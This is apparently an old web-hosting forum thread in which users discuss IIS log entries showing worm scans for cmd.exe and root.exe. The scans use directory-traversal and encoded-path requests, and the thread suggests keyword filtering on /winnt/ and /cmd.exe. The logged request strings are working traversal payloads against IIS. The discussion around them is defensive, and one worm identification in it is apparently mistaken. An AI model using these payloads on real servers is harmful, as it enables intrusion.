Windows Attacks

[xweb]

Anyone else seeing these entries in their logs? Why do people even bother to try this crap?

2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/root.exe /c+dir 404 3 4184 72 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /MSADC/root.exe /c+dir 404 3 4184 70 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:30 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 4184 80 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 117 0 HTTP/1.0 - - -
2002-09-19 14:20:31 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 145 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:32 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /winnt/system32/cmd.exe /c+dir 404 3 4184 97 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 98 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 4184 100 16 HTTP/1.0 - - -
2002-09-19 14:20:33 65.118.87.57 - W3SVC439 NT10 65.57.227.159 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 3 4184 96 0 HTTP/1.0 - - -

That happens ALL THE TIME when you have a windows machine online. Nothing you can do except hope the servers are patched =)

[admin]

They are all patched its just Codered running around trying to get in to servers..

[BCS]

Welcome to the wonderful world of hosting

Seriously, this is the signature of a Sir-Cam type
worm virus. Probably from a computer that the
owner doesn't even know they are infected.

For Unix based hosting, you are usually safe against
these attacks since the requests do not apply. It's
common to see these in Unix logs as well.

With windows based, if the IIS machine is current on
any MS security updates, they are usually not a
problem.

[xweb]

Yes, however, it sure does clog up the log files!

[admin]

We will be setting up a new firewall here soon so i may make a forum for this.. Where users could submit there logs and we could block the server doing it and send them an email. It would be a lot of work but maybe able to work some thing out.

[jammin]

Sounds like a good idea...

Not sure if you can, but ideally if you can filter keywords in the http get command, you could cut out most of these with a few choice words..

eg

/winnt/
/cmd.exe

etc... of course you would have to be VERY sure that no legitimate request would come through with those keywords in it!

[xweb]

That does sound like a good plan.